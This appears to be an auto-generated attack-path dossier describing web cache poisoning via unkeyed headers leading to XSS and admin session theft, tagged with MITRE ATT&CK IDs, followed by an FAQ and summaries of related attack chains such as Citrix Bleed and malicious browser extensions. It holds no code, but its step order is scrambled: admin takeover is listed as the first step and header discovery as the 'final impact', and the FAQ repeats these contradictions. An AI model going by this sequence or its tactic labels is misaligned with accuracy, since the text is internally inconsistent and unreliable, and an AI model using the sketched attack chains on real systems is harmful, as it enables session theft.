Web cache poisoning → XSS → admin session hijack

§ Context

Assumed environment: a shared cache (Varnish / Cloudflare / Akamai) keys on path+query but not on the vulnerable header. An admin user fetches the cached path periodically.

§ Steps

1. 01
   Admin account takeoverInitial Access

   T1078— Valid Accounts
2. 02
   Wait for admin to hit cached pathInitial Access

   T1078— Valid Accounts
3. 03
   Exfil admin session cookieCredential Access

   T1539— Steal Web Session Cookie
4. 04
   Craft XSS payload via headerImpact

   W-XSS-REFLECTED— Reflected XSS
5. 05
   Poison cache entryImpact

   W-CACHE-POISON— Web Cache Poisoning
6. 06
   Identify unkeyed header reflectionImpact

   W-CACHE-POISON— Web Cache Poisoning

   X-Forwarded-Host / X-Forwarded-Scheme / X-Original-URL classic.

§ References

• T1078Valid Accounts
• T1539Steal Web Session Cookie

§ Frequently asked

What is the "Web cache poisoning → XSS → admin session hijack" attack path?

An unkeyed header reflects into the response. Poison the cache with a payload, wait for an admin to fetch the cached page, exfiltrate their session. It chains 6 steps drawn from real-world offensive-security techniques.

What starting position does this attack require?

The first step is Admin account takeover (T1078) — a initial access primitive. Assumed environment: a shared cache (Varnish / Cloudflare / Akamai) keys on path+query but not on the vulnerable header.

What is the final impact of this kill-chain?

The final step lands on Identify unkeyed header reflection (W-CACHE-POISON), which falls under Impact. From here, an operator typically pivots into post-exploitation or maintains persistence.

How can defenders detect or prevent this attack?

Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

§ Related dossiers

• Shared techniques2

  5G core GTP-U user-plane injection → subscriber MITM

  Attacker on a transit network between mobile-core hops (or with compromised UPF). GTP-U packets are typically unfiltered between PEs; inject packets into subscriber bearers — credential capture, free-of-charge tunnels, downstream attacks.

• Shared techniques2

  FIDO2 caBLE hybrid → phone authenticator hijack

  Attacker phishing site shows the legitimate FIDO2 QR. Victim scans with their phone authenticator. The link completes the WebAuthn ceremony in the attacker's browser — they're now signed in as the victim.

• Shared techniques2

  F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB

  Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.

• Shared techniques2

  Citrix Bleed → steal authenticated session → MFA bypass

  Send a long Host header to a vulnerable NetScaler — memory disclosure leaks an authenticated session token already past MFA. Replay the token to log into the corporate VPN.

• Shared techniques2

  Malicious browser extension → cookie harvest → ATO

  Publish a useful-looking extension (ad-blocker / PDF reader). It quietly reads cookies + localStorage from sensitive sites and ships them to the attacker.

• Shared techniques2

  Compromised extension auto-update → fleet compromise

  Take over a popular extension's developer account (credential stuffing on the store, abandoned email domain). Push a malicious version — every existing install runs attacker code on next launch.